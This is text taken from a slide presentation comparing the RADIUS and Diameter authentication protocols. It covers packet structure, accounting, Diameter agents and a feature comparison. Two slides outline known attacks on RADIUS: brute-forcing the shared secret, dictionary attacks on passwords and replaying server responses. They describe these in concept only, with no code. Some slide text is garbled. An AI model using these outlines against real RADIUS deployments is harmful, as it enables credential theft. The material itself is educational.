diameter and radius

7/30/2019 Diameter and Radius

1/18

RADIUS & Diameter

Protocol

Presented By:

Atul Kumar Srivastava(2017)

Vishal sangale(2009)

Prashant Pandey(2004)


2/18

RADIUS - Introduction :

RADIUS is an application level protocol that carries authentication, authorization andconfiguration information between a Network Access Server (NAS) and a SharedAuthentication Server.

A standardized protocol is required between the access server and the userinformation repository in order to exchange authentication-, authorization-, and

accounting-related information. The RADIUS protocol was designed to provide asimple, but efficient, way to deliver such AAA capability.

Key Featuresof RADIUS :

Client Server model Network Security

Flexible Authentication mechanism

Extensible protocol


3/18

Terminology :

Service

Session

Silently discard

Access-Request

Access-Accept


4/18

RADIUS Overview :

Authentication

Request

Username &

Password

Authentication

Acknowledgement

User Radius

Client

Radius

Server


5/18

Authentication and Authorization :

Access Request Frame

Access-Reject

or Access-Challengeor Access-Accept

Radius

Client

Radius

Server


6/18

Accounting

Built-in accounting schemes:

Unix accounting

Accounting data are stored in files and can be viewed using radwho and

radlast commands

Detailed accounting

The detailed accounting information is stored in plain text format. Theresulting files can easily be parsed using standard text processing tool.

SQL accounting

information stores it in an SQL database, processed using standard SQL

queries.

Radius is extensible


7/18

Packet Frame:

Details

Code

Identifier

Length

Authenticator- Value used to authenticate the reply from the RADIUS server

Attributes - The data


8/18

Client Server Sequence

NAS sends encrypted user info with

access request

Access accept with IP-address,

network mask, allowed session time,

etc

Accounting Phase starts withAccounting Request

When user logs out accounting phase

ends with NAS sending an

'Accounting-request (Stop)' with some

additional information.

The RADIUS Server responds with an

'Accounting-response' when the

accounting information is stored.


9/18

Limitations

Response Authenticator Based Shared Secret Attack

Attacker listens to requests and server responses, and pre-compute MD5 state,which is the prefix of the response authenticator:

MD5(Code+ID+Length+ReqAuth+Attrib)

Perform an exhaustive search on shared secret, adding it to the above MD5state each time.

User-Password Attribute Based Shared Secret Attack

Perform an exhaustive search on shared secret.

The attacker attempts a connection to the NAS, and intercepts the access-request.

User-Password Based Password Attack Performs an exhaustive / dictionary attack on password, XORing it with above

MD5 and sending it each time in appropriate attribute.

Possible due to no authentication on request packet.


10/18

Limitations Continued

Shared Secret Hygiene

Viewed as single client

Small key size enabling easy attack

Request Authenticator Based Attacks Passive User-Password Compromise through Repeated Request

Authenticators

Active User-Password Compromise through Repeated RequestAuthenticators

Attacker builds a dictionary as before.

When he predicts he can cause NAS to use a certain ReqAuth, he tries toconnect it and intercepts access-request.

Replay of Server Responses through Repeated Request Authenticators The attacker builds a dictionary with ReqAuth, ID and entire server response.

Most server responses will be access-accept.


11/18

Diameter - Introduction

The Diameter protocol was derived from the RADIUS protocol with a lot of

improvements in different aspects, and is generally believed to be the next

generation Authentication, Authorization, and Accounting (AAA) protocol.

The Diameter protocol was widely used in the IMS architecture for IMS

entities to exchange AAA-related information. Next generation Authentication, Authorization, and Accounting (AAA)

protocol


12/18

Diameter nodes and agents

Diameter is designed as a Peer-To-Peer architecture, and

every host who implements the Diameter protocol can act

as either a client or a server depending on network

deployment


13/18

THREE TYPES OF DIAMETER

AGENTS- Relay Agent

A Relay Agent is used to forward a message to the appropriate

destination, depending on the information contained in the message.

Proxy Agent

A Proxy Agent can also be used to forward messages, but unlike aRelay Agent, a Proxy Agent can modify the message content and,

therefore, provide value-added services, enforce rules on different

messages, or perform administrative tasks for a specific realm.

Redirect AgentA Redirect Agent acts as a centralized configuration repository for

other Diameter nodes. When it receives a message, it checks its routing

table, and returns a response message along with redirection

information to its original sender


14/18

Special agent

Translation Agent

In addition to these agents, there is a special agent called

Translation Agent. The responsibility of this agent, as you

might have guessed, is to convert a message from one

AAA protocol to another


15/18

Diameter packet format

C i f Di t d


16/18

Comparison of Diameter and

RADIUS protocols

Diameter Radius

Transportation Protocol

Connection-Oriented Protocols (TCP

and SCTP) Connectionless Protocol (UDP)

Security Hop-to-Hop, End-to-End Hop-to-Hop

Agent Support Relay, Proxy, Redirect, Translation

Implicit support, which means the

agent behaviors might beimplemented in a RADIUS server

Capabilities Negotiation

Negotiate supported applications and

security level Don't support

Peer Discovery

Static configuration and dynamic

lookup Static configuration

Server Initiated Message

Supported. for example, re-

authentication message, Session

termination Don't support

Maximum Attribute Data Size 16,777,215 octets 255 octets

Vendor-specific Support

Support both vendor-specific

messages and attributes

Support vendor-specific attributes

only


17/18

Summary

RADIUS is a remote authentication protocol.

RADIUS is a de-facto standard for remote authentication.

RADIUS is an extensible protocol, and can support many authentication

methods (e.g. EAP).

RADIUS has several weaknesses.

Usage of stream cipher

Transaction of Access-Request not authenticated at all

The RADIUS specification should require each client use a different Shared Secret.

It should also require the shared secret to be a random bit string at least 16 octets

long that is generated by a PRNG.

DIAMETER brought in to replace RADIUS and fix some of the flaws

Uses TCP

Better transmission level security using IPSEC


18/18

Cont..

In addition to SIP, Diameter is the other core protocol used

in the IP Multimedia Subsystem (IMS) architecture, both

in the service plane and the control plane. IMS defines a

set of reference points between different IMS entities and

some of them use Diameter as the underlying protocol toexchange subscription-, presence-, and billing-related

messages. For example, the Sh reference point in IMS

defined a set of Diameter messages for subscription and

notification purposes.

diameter and radius

Documents